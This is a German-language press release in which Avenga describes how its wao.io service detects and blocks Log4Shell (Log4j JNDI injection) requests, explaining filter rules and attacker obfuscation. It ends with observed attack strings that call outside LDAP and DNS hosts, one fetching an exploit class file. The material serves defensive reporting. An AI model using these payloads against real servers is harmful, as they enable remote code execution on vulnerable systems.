Log4j-Exploit: wao.io von Avenga schützt Web-Services und deren Nutzer vor kritischer Lücke

Log4j wao.io

Die am 9. Dezember veröffentlichte kritische Zero-Day-Lücke in Version 2.14.1 der verbreiteten Apache Log4j Library betrifft nahezu alle Online-Services weltweit. Das Bundesamt für Sicherheit in der Informationstechnik (BSI) stuft die Lücke in Kategorie 4/Rot ein. Sicherheitsexperten des IT-Unternehmens Avenga haben deshalb die Möglichkeiten zur Ausnutzung dieses Exploits analysiert und erste Maßnahmen zum Schutz in den hauseigenen Service wao.io implementiert. Die Cloud-Lösung lässt sich wie ein Content Delivery Network integrieren und wird vor allem von zahlreichen E-Commerce-Unternehmen genutzt, um Webshops ohne Änderungen am Code ihrer Seiten sicherer und schneller anbieten zu können.

In den ersten 72 Stunden seit Bekanntwerden der Sicherheitslücke hat wao.io 1.159 schadhafte Requests von Angreifern auf Kundenseiten abgewehrt. Vor allem zwei konkrete Maßnahmen kommen dabei zum Einsatz:

  • URL und Request-Header (z.B. User-Agent): Zeichenketten mit der verdächtigen Folge ${ (analog %24 und %7b) führen zur Blockade der Anfrage.
  • POST-Requests: Bei Form-Posts (wie z.B. HTML Login Formulare) werden auch diese Werte nach verdächtigen Zeichenketten gescannt und ggf. blockiert.

Zwar versuchen die Angriffe alle, ein Muster der Form ${jndi:ldap… zu injizieren, dennoch genügt es für die erfolgreiche Abwehr sämtlicher Angreifer nicht, nur nach diesem Substring zu suchen. Das wäre zwar ein einfacher erster Schritt, um die offensichtlichste Form der Attacke zu erkennen, doch sind die Angreifer durch Verbesserungen der Attacke während der ersten Tage schon einen Schritt weiter: Zur Verschleierung verwenden sie verschachtelte Konstrukte, um die Injection unkenntlich zu machen, z.B. ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}…

Wird diese Zeichenkette geparst, löst sie sich wieder zu der ursprünglichen Form auf, wird aber von einer einfachen Suche nach ${jndi:ldap… nicht mehr gefunden. Neben den LDAP-Funktionen werden auch DNS-Auflösungen probiert. Mit den von wao.io in den letzten Tagen eingerichteten Sicherheitsmechanismen werden auch solche ausgereifteren Angriffe erkannt und abgewehrt.

Das Risiko des versehentlichen Blockierens legitimer Anfragen mit diesen Zeichen (False Positives) ist dabei sehr gering. Experten analysieren dennoch fortlaufend die Logdateien und stellen sicher, dass Kunden von wao.io ihre Angebote nicht nur sicher, sondern auch zuverlässig und ohne Ausfallzeiten weiter betreiben können.

"Wir werden die Aktivitäten rund um die log4shell-Lücke weiter beobachten und den Schutz in wao.io dementsprechend anpassen", sagt Roland Guelle, VP Technology von Avenga. Und weiter: "Es ist wichtig zu verstehen, dass wao.io alleine als Schutz dennoch nicht ausreicht. Es gibt auch andere Möglichkeiten, die Lücke auszunutzen, die wir mit unserem Ansatz nicht verhindern können. Nutzer sollten daher unbedingt auf ihrer Seite Maßnahmen ergreifen, um die schadhafte Softwareversion auszutauschen, oder die Ausführung des problematischen Codes durch entsprechende Einstellungen zu verhindern."

Das Team hinter wao.io analysiert fortlaufend das Verhalten der Angreifer, um bei abgewandelten Angriffen unmittelbar reagieren zu können. Dabei fielen bereits zahlreiche Fälle von Kombinationen verschiedener Angriffs-Muster auf: Auch andere Arten von Attacken (z.B. Code- oder SQL-Injections) werden getestet, die Versuche werden nun zusätzlich ausgedehnt auf die neu bekannt gewordene Sicherheitslücke. Das verdeutlicht, dass ein umfassender Webseiten-Schutz unabhängig von der aktuellen Sicherheitslücke und auch darüber hinaus unbedingt notwendig ist. Unternehmen sollten dafür auch auf eigene Experten mit entsprechendem Monitoring setzen, sowie zusätzlich CDN-Anbieter wählen, die eine Schutzfunktion vor diesen und anderen Angriffsvektoren mitbringen. Auch der Abschluss entsprechender Versicherungen empfiehlt sich, falls die Gegenmaßnahmen fehlschlagen oder zu spät kommen.

Beispiele von Angriffs-Requests, die den Sicherheitsexperten von Avenga aufgefallen sind

User-Agent:

${jndi:ldap://c6rlj0ovc25q3hjjf3tgcg5iubyyyyypw.interact.sh/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.example.com}

Request-Header via:

${jndi:ldap://n714d2e7e.aHR0cDovL3JhdG9yLXN0YWdlLm5ldHpjbHViLm5ldDo4MA==.dnsprobe.${::-r}edteam.tf/exploit.class}

Request-Header x-forwarded-for:

${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.0000nlm6c0j53v2s668g61398133715me.interact.sh}

Pfad:

/?test=${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://interactsh-url/poc}